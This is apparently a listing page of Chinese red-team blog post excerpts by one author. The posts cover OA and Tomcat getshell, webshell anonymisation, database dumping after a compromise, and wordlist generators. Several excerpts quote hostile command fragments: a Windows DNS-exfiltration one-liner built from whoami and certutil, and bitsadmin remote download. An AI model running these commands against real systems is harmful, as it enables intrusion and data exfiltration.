微信小程序测试_反编译_一键化工具py2_wxapp 前言最近测试微信小程序的时候没有找到那种一键化的工具。每次都是他运行一下，另一个运行一下。单包的时候还好说，最近遇到很多分包的情况。差点累死。然后写了这个聚合工具。介绍py2_wxapp_V1.1版本... 2023-2-1 11:25:12 | 阅读: 34 | 收藏 | 白帽兔 脚本 分包 解包 wxapp wxapkg

信息收集（1）——最全子域名收集改造计划 前言祝表哥们新年快乐！！！最近迷上了挖洞。因为可以让我加个鸡腿。挖洞越多发现越发现，自己的信息收集确定丢三落四。别人提交漏洞的url。我竟然找不到。这不气死人。才有这个故事1信息收集第一步当然是子域名... 2023-1-17 12:16:9 | 阅读: 11 | 收藏 | 白帽兔 arl 表哥 信息 挖洞 github

攻防演练实战之梅开二度-致远OA-rce 前言好久没有写文章了。1.最近入了很多众测。安心挖洞。2.没有比赛就没有什么好文章输出。这不刚结束就写文章给表哥们了。环境介绍其中目标是一个学校,不止一次的被打过了。这次肯定是修复了。上次手法对学校进... 2022-12-9 11:48:43 | 阅读: 17 | 收藏 | 白帽兔 5cu0065 5cu002e 5cu0061 u002e u0065

4位数CVE编号申请 前言发现有小伙伴对cve这种证书念念不忘想起来自己刚入行的时候也在满世界的寻找如何获取cve证书的途径。现在发现申请cve证书非常简单。1想要申请当然需要一个漏洞了。这里比较简单的就是一些大的cms的... 2022-11-2 11:4:42 | 阅读: 18 | 收藏 | 白帽兔 漏洞 github 证书 xxxcms 注入

实用插件——指纹、蜜罐识别插件 插件下载地址：https://github.com/graynjo/Heimdallr/releases/tag/v1.0被动嗅探高危指纹和蜜罐特征，并进行拦截告警的谷歌插件同时进行了evercook... 2022-10-22 11:22:44 | 阅读: 51 | 收藏 | 白帽兔 蜜罐 chrome 拦截 浏览器 jsonp

各种环境DNS外带回显命令 1. windows 命令行：cmd /v /c "whoami > temp && certutil -encode temp temp2 && findstr /L /V "CERTIFICATE... 2022-10-19 12:22:42 | 阅读: 10 | 收藏 | 白帽兔 whoami temp2 temp3 myvar windows

实战之低版本tomcat-getshell 前言某次红蓝对抗中,发现目标低版本的tomcat弱口令，但是常规的war包无法上传。祝各位表哥国庆节假期快乐。环境介绍linuxtomcat6.0过程-上传war包直接修改后缀,尝试war包上传。发... 2022-10-13 09:3:53 | 阅读: 14 | 收藏 | 白帽兔 低版本 axis2 马子 aar 表哥

PyBy2--若依计划任务自动化上线 前言重复的遇到一个问题。重复的做一个问题，不由自主的烦恼。修改最近遇到的若依比较多,虽然后台的计划任务成功很低,但是每次进入后台还是会尝试一下，但是网上的方法每次都要去改脚本,实在太麻烦。不如写几行代... 2022-9-29 11:21:32 | 阅读: 36 | 收藏 | 白帽兔 几行 不由 脚本 烦请

火花字典生成器V2.0(大改版-社工字典) 前言火花字典生成器大版本更新,值得拥有！更新内容1.新增社工字典生成.2.新增简单md5hash碰撞.3.非常好用。1简单的hash碰撞因为平时实战多,遇到过很多md5无法破解的hash。可以使用字典... 2022-9-13 12:52:24 | 阅读: 331 | 收藏 | 白帽兔 社工 火花 github 增删 烦请

获取海康所有摄像头appkey-Secret用法 前言首发在知识星球,没想到有这么多表哥来交流。1最近遇到海康多一点，但是无法直接进后台。发现很多js会存在泄漏key和secret可以直接访问到摄像头。不止一次遇到。1js发现进行js多次查看发现存在... 2022-9-6 11:22:32 | 阅读: 65 | 收藏 | 白帽兔 rtsp 泄漏 passwd appkey

跌跌撞撞的攻防打点 前言每一次攻防都会有"从遇到问题到解决问题"的过程。环境介绍泛微OALinuxwebshell上传这里是使用泛微前台任意文件上传。上传过程中遇到一点小问题上传众多文件。出现以下错误或者是无法连接的问题... 2022-8-17 11:21:48 | 阅读: 20 | 收藏 | 白帽兔 代理 马子 哥斯拉 斯拉 前台

[红队TIPS]查看数据库大小+Mysql备份大法 在获取了目标服务器权限之后，一般取证要拿到源码，还得要拿到数据库文件，这样可以在本地搭建相同的环境进行复现数据。难点，判断数据库和表的大小，以便进行选择性脱裤和打包。一、查看... 2022-8-5 11:21:53 | 阅读: 27 | 收藏 | 白帽兔 数据 数据库 mysqldump truncate 备份

炽热如初 向新而生｜ISC2022 HackingClub白帽峰会圆满举办！ //  8月2日，由ISC2022互联网安全大会和HackingClub安全技术社区联合举办的ISC2022 HackingClub白帽峰会在N世界平台顺利召开。查看回放：https://isc.... 2022-8-4 19:4:8 | 阅读: 11 | 收藏 | 白帽兔 安全 漏洞 网络 攻防 hackingclub

Springboot heapdump泄露读取分析 1.1 可能泄露路由列表/api-docs /v2/api-docs /swagger-ui.html /api.html /sw/swagger-ui.html /api/... 2022-8-2 11:21:11 | 阅读: 20 | 收藏 | 白帽兔 actuator heapdump 信息 swagger jolokia

ISC2022 HackingClub白帽峰会倒计时1天！最全议程正式公布！元宇宙集结，精彩绝伦！ 护航数字文明，开创数字安全新时代，ISC2022 HackingClub白帽峰会再开先河，以“一场关于漏洞的进化论”为主题，从全新的“漏洞进化”视角，同监管领导、行业专家、厂商代表及百余家安全战队和广... 2022-8-1 12:47:18 | 阅读: 26 | 收藏 | 白帽兔 安全 hackingclub 榜样 网络 漏洞

警惕! 一种针对红队的新型溯源手段! 这个蜜罐的溯源方式针对使用手机热点的红队人员。蜜罐直接获取攻击者手机号进行溯源。一抓一个准。各位红队人员小心为妙。首先打开网站，他会监控是否开启了F12控制台，如果开启了调试... 2022-7-29 17:4:21 | 阅读: 38 | 收藏 | 白帽兔 atob client 溯源 tk vsecret

[红队TIPS]Windows远程下载文件方法 核心思想为不能使用要求过高, 最好是windows原生就有的, 或是使用非常方便的才记录在此使用方法: bitsadmin /transfer n '下载地址' '保存地址'... 2022-7-26 12:17:31 | 阅读: 22 | 收藏 | 白帽兔 远程 certutil urlcache 181 windows

紧急更新-火花字典生成器V1.2版本 前言因为bug问题,表哥催更～1存在的bug存在v1.1版本:1.因为要手动配置ini文件,因为格式问题导致闪退。2.因为A列表更新规则,导致无法支持字符,只支持中文.3.A... 2022-7-25 16:51:55 | 阅读: 17 | 收藏 | 白帽兔 修复 不在乎 烦请 致歉 谢谢

防溯源链接webshell 原理介绍这个技术的核心原理是利用腾讯云的云函数将我们的请求进行转发(和一些使用第三方应用进行转发是一样的)。在国外应该早就玩烂了。具体步骤创建函数使用默认模板即可，然后选择下... 2022-7-22 11:22:28 | 阅读: 18 | 收藏 | 白帽兔 postdata 隐藏 urlstr jurlstr geturl

字典生成器-火花V1.1升级版本 前言对火花字典生成器进行了版本升级。经过实战,增加了很多功能。1新版本展示新版本说明:1.规则更加完善,立志让见过的密码都可以生成出来。2.新加了高级设置,长度/复杂度/年月... 2022-7-20 11:22:56 | 阅读: 39 | 收藏 | 白帽兔 火花 年月日 张三 立志